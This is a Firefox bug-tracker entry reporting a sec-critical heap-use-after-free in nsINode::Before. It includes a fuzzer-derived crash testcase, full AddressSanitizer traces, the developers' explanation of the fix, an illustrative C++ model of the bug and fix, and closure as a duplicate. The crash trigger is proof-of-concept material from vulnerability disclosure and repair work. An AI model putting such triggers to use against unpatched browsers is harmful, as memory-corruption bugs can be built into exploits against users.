Bug 1303168: heap-use-after-free in nsINode::Before
Status: Closed. Opened 9 years ago, closed 9 years ago.
Categories: Core :: DOM: Core & HTML, defect, P1
Tracking: RESOLVED DUPLICATE of bug 1301777
| Tracking | Status | |
|---|---|---|
| firefox51 | --- | affected |
People: Reporter: nils, Assigned: edgar
Keywords: csectype-uaf, reporter-external, sec-critical
Attachments (2 files):
- 440 bytes, text/html (Details)
- 972 bytes, patch; mccr8: review+ (Details | Diff | Splinter Review)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20160914134208) as follows. The fuzzPriv extension is required for the testcase.
crash.html:
<script>
function start() {
// Document 1: the node that will carry a DOMNodeInserted listener running f1.
o555=(new DOMParser()).parseFromString('','text/html');
o557=o555.all[1];
o557.addEventListener('DOMNodeInserted',f1);
// Document 2: the target of before(). The first call converts the non-node
// arguments into text-node siblings; the second passes o557, whose move
// fires the DOMNodeInserted listener while nsINode::Before is still running.
o1899=(new DOMParser()).parseFromString('','text/html');
o1902=o1899.all[2];
o1902['before'](undefined,undefined,16,1,undefined);
o1902['before'](undefined,o557,undefined,8388613,8,1e100);
}
function f1() {
// Runs mid-Before: normalize() merges the adjacent text nodes and the forced
// cycle collection frees the merged-away one that Before still points at.
o1899.normalize();
fuzzPriv.CC();
}
</script>
<body onload="start()"></body>
ASAN output:
=================================================================
==11516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0000c6d68 at pc 0x7f8ff8b1cd56 bp 0x7ffc8179ca70 sp 0x7ffc8179ca68
READ of size 8 at 0x60d0000c6d68 thread T0 (Web Content)
#0 0x7f8ff8b1cd55 in nsINode::Before(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1772:27
#1 0x7f8ffa42362b in mozilla::dom::ElementBinding::before(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3518:3
#2 0x7f8ffa81e5b0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2812:13
#3 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#4 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#5 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#6 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#7 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#8 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#9 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#10 0x7f9000432a38 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2835:12
#11 0x7f8ffa35b878 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#12 0x7f8ffac77041 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#13 0x7f8ffac77041 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#14 0x7f8ffac43994 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
#15 0x7f8ffac454c1 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#16 0x7f8ffac2e7b2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#17 0x7f8ffac32c9d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#18 0x7f8ffce711a8 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:998:7
#19 0x7f8ffdbef9dc in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7606:5
#20 0x7f8ffdbeb998 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7406:7
#21 0x7f8ffdbf2d7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7303:13
#22 0x7f8ff7b2e6c0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#23 0x7f8ff7b2d688 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#24 0x7f8ff7b2a43c in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#25 0x7f8ff7b2c514 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
#26 0x7f8ff7b2d09c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
#27 0x7f8ff5f890eb in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
#28 0x7f8ff8a6b1bf in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
#29 0x7f8ff8b56bff in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8593:5
#30 0x7f8ff5dae72d in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1059:7
#31 0x7f8ff5e2cfac in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
#32 0x7f8ff6b7111f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
#33 0x7f8ff6ae4398 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#34 0x7f8ff6ae4398 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#35 0x7f8ff6ae4398 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#36 0x7f8ffc593e0f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
#37 0x7f8ffe6d6e97 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:12
#38 0x7f8ff6ae4398 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
#39 0x7f8ff6ae4398 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
#40 0x7f8ff6ae4398 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
#41 0x7f8ffe6d63bd in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:705:7
#42 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
#43 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:367
#44 0x7f901130a82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
#45 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)
0x60d0000c6d68 is located 56 bytes inside of 136-byte region [0x60d0000c6d30,0x60d0000c6db8)
freed by thread T0 (Web Content) here:
#0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
#1 0x7f8ff5c8a084 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2681:9
#2 0x7f8ff5c89c76 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2855:3
#3 0x7f8ff5c9049c in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3832:3
#4 0x7f8ff5c8fc7c in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3657:9
#5 0x7f8ff5c92e56 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4148:3
#6 0x7f8ff8b32ed9 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
#7 0x7f8ff86b181d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1338:3
#8 0x7f8ff5dd4486 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
#9 0x7f8ff76fc3ae in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2065:12
#10 0x7f8ff76fc3ae in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1384
#11 0x7f8ff76fc3ae in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1351
#12 0x7f8ff7703acb in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1143:12
#13 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#14 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#15 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#16 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#17 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#18 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#19 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#20 0x7f90004304da in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2776:12
#21 0x7f8ff76371af in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:353:18
#22 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#23 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#24 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#25 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#26 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#27 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#28 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#29 0x7f9000432a38 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2835:12
#30 0x7f8ffa35e11d in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
#31 0x7f8ffac43949 in HandleEvent<mozilla::dom::EventTarget *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
#32 0x7f8ffac43949 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1129
#33 0x7f8ffac454c1 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#34 0x7f8ffac2e7b2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#35 0x7f8ffac32c9d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#36 0x7f8ffac35038 in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:777:12
previously allocated by thread T0 (Web Content) here:
#0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
#1 0x4e0bcd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f8ff8a487ed in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f8ff8a487ed in nsIDocument::CreateTextNode(nsAString_internal const&) const /home/worker/workspace/build/src/dom/base/nsDocument.cpp:5511
#4 0x7f8ff8b1d15f in GetNodeFromNodeOrString /home/worker/workspace/build/src/dom/base/nsINode.cpp:1672:7
#5 0x7f8ff8b1d15f in ConvertNodesOrStringsIntoNode(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, nsIDocument*, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1696
#6 0x7f8ff8b1cb6d in nsINode::Before(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1767:5
#7 0x7f8ffa42362b in mozilla::dom::ElementBinding::before(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:3518:3
#8 0x7f8ffa81e5b0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2812:13
#9 0x7f900093361c in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:235:15
#10 0x7f900093361c in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:442
#11 0x7f90009133a0 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
#12 0x7f90009133a0 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2918
#13 0x7f90008f893b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:400:12
#14 0x7f9000933e34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
#15 0x7f90009348a1 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
#16 0x7f9000432a38 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2835:12
#17 0x7f8ffa35b878 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
#18 0x7f8ffac77041 in Call<nsISupports *> /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
#19 0x7f8ffac77041 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
#20 0x7f8ffac43994 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
#21 0x7f8ffac454c1 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
#22 0x7f8ffac2e7b2 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
#23 0x7f8ffac32c9d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
#24 0x7f8ffce711a8 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:998:7
#25 0x7f8ffdbef9dc in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7606:5
#26 0x7f8ffdbeb998 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7406:7
#27 0x7f8ffdbf2d7f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7303:13
#28 0x7f8ff7b2e6c0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
#29 0x7f8ff7b2d688 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
#30 0x7f8ff7b2a43c in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
#31 0x7f8ff7b2c514 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
#32 0x7f8ff7b2d09c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
#33 0x7f8ff5f890eb in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
#34 0x7f8ff8a6b1bf in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8640:7
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.cpp:1772:27 in nsINode::Before(mozilla::dom::Sequence<mozilla::dom::OwningNodeOrString> const&, mozilla::ErrorResult&)
Shadow bytes around the buggy address:
==11516==ABORTING
Updated 9 years ago
Group: core-security → dom-core-security
Keywords: csectype-uaf, sec-critical
Updated 9 years ago (Assignee)
Assignee: nobody → echen
Updated 9 years ago
Priority: -- → P1
Comment 1 (Assignee), 9 years ago
nsINode::Before must keep the viablePreviousSibling alive.
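To make comment 1 concrete, here is a toy model of the before() algorithm, written as an added example and not Gecko's code: std::shared_ptr stands in for RefPtr/nsCOMPtr, a weak_ptr stands in for the raw viablePreviousSibling pointer of the bug so the dangling case can be observed without reading freed memory, and a callback stands in for the DOMNodeInserted listener that runs script mid-algorithm. Node, before, removeChild and runScenario are invented names.

```cpp
// Toy model of the DOM before() algorithm; added example, not Gecko code.
// shared_ptr stands in for RefPtr/nsCOMPtr, scriptHook for the DOMNodeInserted
// listener that ran normalize() and a CC while nsINode::Before was executing.
#include <algorithm>
#include <functional>
#include <memory>
#include <vector>
struct Node {
    Node* parent = nullptr;                       // non-owning, as in a DOM tree
    std::vector<std::shared_ptr<Node>> children;  // the parent owns its children
};
using NodePtr = std::shared_ptr<Node>;
static size_t indexOf(const Node* parent, const Node* child) {
    const auto& c = parent->children;
    auto it = std::find_if(c.begin(), c.end(),
                           [child](const NodePtr& n) { return n.get() == child; });
    return static_cast<size_t>(it - c.begin());
}
static NodePtr appendChild(const NodePtr& parent) {
    auto child = std::make_shared<Node>();
    child->parent = parent.get();
    parent->children.push_back(child);
    return child;
}
// Detach child; if the tree held the last reference, the node is freed right
// here, which is what the cycle collection did in the report.
static void removeChild(Node* parent, Node* child) {
    child->parent = nullptr;   // before the erase, which may destroy the node
    parent->children.erase(parent->children.begin() + indexOf(parent, child));
}
// Returns the index newNode was inserted at, or -1 if the saved previous
// sibling died inside the hook (the line where the real code read freed memory).
// keepAlive=false keeps only a weak_ptr across the hook, standing in for the
// bug's raw pointer without touching freed memory; keepAlive=true keeps a
// strong reference, which is the fix comment 1 describes.
static int before(const NodePtr& self, const NodePtr& newNode,
                  const std::function<void()>& scriptHook, bool keepAlive) {
    Node* parent = self->parent;
    size_t idx = indexOf(parent, self.get());
    // Step 1: viablePreviousSibling = the sibling just before self.
    std::weak_ptr<Node> weakPrev;
    NodePtr strongPrev;
    if (idx > 0) {
        if (keepAlive) strongPrev = parent->children[idx - 1];
        else           weakPrev   = parent->children[idx - 1];
    }
    // Step 2: converting the arguments fires the mutation event; script runs.
    scriptHook();
    NodePtr prev = keepAlive ? strongPrev : weakPrev.lock();
    if (idx > 0 && !prev) return -1;   // the would-be use-after-free
    // Step 3: insert before prev's next sibling. A detached but alive prev has
    // no next sibling, so newNode is appended; with no prev, insert at front.
    size_t at = 0;
    if (prev) {
        at = prev->parent == parent ? indexOf(parent, prev.get()) + 1
                                    : parent->children.size();
    }
    newNode->parent = parent;
    parent->children.insert(parent->children.begin() + at, newNode);
    return static_cast<int>(at);
}
// Tree [a, b, c]; b.before(newNode) while a hostile hook removes and frees a.
static int runScenario(bool keepAlive, bool hostileHook) {
    NodePtr root = std::make_shared<Node>();
    appendChild(root); NodePtr b = appendChild(root); appendChild(root);  // a, b, c
    auto hook = [&]() { if (hostileHook) removeChild(root.get(), root->children[0].get()); };
    return before(b, std::make_shared<Node>(), hook, keepAlive);
}
```

With the strong reference the detached sibling survives the hook and the insert degrades to an append; with only the weak reference the sibling is already gone when step 3 needs it, which is the read ASan flagged at nsINode.cpp:1772.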
Comment 2 (Assignee), 9 years ago
Updated 9 years ago (Assignee)
Attachment #8794040 - Flags: review?(continuation)
Updated 9 years ago (Assignee)
Attachment #8794040 - Flags: sec-approval?
Updated 9 years ago
Attachment #8794040 - Flags: review?(continuation) → review+
Comment 3, 9 years ago
argh, this is a dup of a bug I have a patch for, and that patch is reviewed...
Comment 4, 9 years ago
Er, it is Bug 1301777.
Updated 9 years ago
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Comment 6, 9 years ago
Comment on attachment 8794040 [details] [diff] [review]
Patch, v1
Sorry, I should have remembered that. I knew there was another similar issue but I didn't realize it was identical.
Attachment #8794040 - Flags: sec-approval?
Updated 9 years ago
Flags: sec-bounty?
Updated 9 years ago
Flags: sec-bounty? → sec-bounty-
Updated 7 years ago
Group: dom-core-security
Updated 1 year ago
Keywords: reporter-external